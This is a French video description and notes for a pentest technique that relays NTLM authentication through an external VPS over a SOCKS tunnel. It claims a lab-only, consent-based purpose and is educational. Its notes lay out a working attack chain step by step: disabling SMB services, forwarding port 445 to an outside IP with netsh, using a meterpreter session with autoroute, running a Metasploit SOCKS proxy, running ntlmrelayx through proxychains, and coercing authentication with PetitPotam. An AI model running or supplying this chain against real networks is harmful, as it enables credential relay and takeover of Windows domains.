Cette technique de PENTEST est radicale !
Processus Thief
Vidéo en français expliquant comment mettre en place un relai d'authentification NTLM par le biais d'une machine située à l'extérieur du réseau local, en établissant un tunnel sur le protocole SOCKS.
Cette vidéo est à vocation instructive. La technique présentée ici est effectuée au sein d'un environnement contrôlé dédié à cet effet.
Un test d'intrusion, ou pentest, doit toujours s'effectuer avec l'accord du client et dans un périmètre défini au préalable.
Quelques infos sur le pivoting et le protocole SOCKS :
- https://learn.microsoft.com/en-us/openspecs/office_protocols/ms-grvhenc/b848fe66-94da-4e79-a9a2-c4f7d517adde?WT.mc_id=SEC-MVP-5005061
- https://learn.microsoft.com/fr-fr/windows-server/networking/technologies/netsh/netsh-interface-portproxy?WT.mc_id=SEC-MVP-5005061
Mon cours GRATUIT complet sur l'authentification sous Windows :
- https://www.youtube.com/watch?v=DzUjaPG0I40&list=PLbunJkN6sXKvh0h9e8Nrojejh6SdkNuQs
- https://docs.lestutosdeprocessus.fr/Authentification%20dans%20Windows%20et%20limitations%20-%20support%20de%20formation.pdf
- https://learn.microsoft.com/fr-fr/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview?WT.mc_id=SEC-MVP-5005061
Quelques infos sur Petit Potam :
- https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451?WT.mc_id=SEC-MVP-5005061
- https://github.com/topotam/PetitPotam
MES NOTES COMPLETES :
Sous Windows : On peut stopper les services LanManServer pour stopper le SMB (modifié) il faut stopper et mettre en disabled les services :
netlogon
lanmanserver
lanmanworkstation
Si les 2 derniers services n'existe pas, passer leur statut "start" à "4" dans le registre :
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation
ensuite on reboot la machine on se reconnecte dessus et on reprend un meterpreter en system sur la machine on forward son port 445 vers notre kali
netsh interface portproxy add v4tov4 listenaddress=172.16.1.100 listenport=445 connectaddress=51.38.35.62 connectport=4450
On génère un meterpreter et on récupère la connexion dans notre VPS On ajoute une route pour faire transiter les paquets vers le lan
run autoroute -s 172.16.1.0/24
On utilise le module proxy_socks dans metasploit pour router les paquets sur le lan au travers d'un tunnel proxy :
use auxiliary/server/socks_proxy
set srvport 8090
set version 4a
run
On modifie notre config proxychains pour passer par le tunnel et on monte un relai ntlm :
proxychains python3 ntlmrelayx.py -t 172.16.1.1 -ts --no-http-server --smb-port 4450 -debug
Ensuite on peut trigger une authentification via proxychains vers la machine de contrôle :
proxychains python3 PetitPotam.py 172.16.1.100 172.16.1.2
Et voilà !
Le lien de mon blog : https://processus.site
Le lien pour rejoindre le serveur Discord : https://discord.gg/JJNxV2h ... https://www.youtube.com/watch?v=RMLcTQyFTWk
236290233 Bytes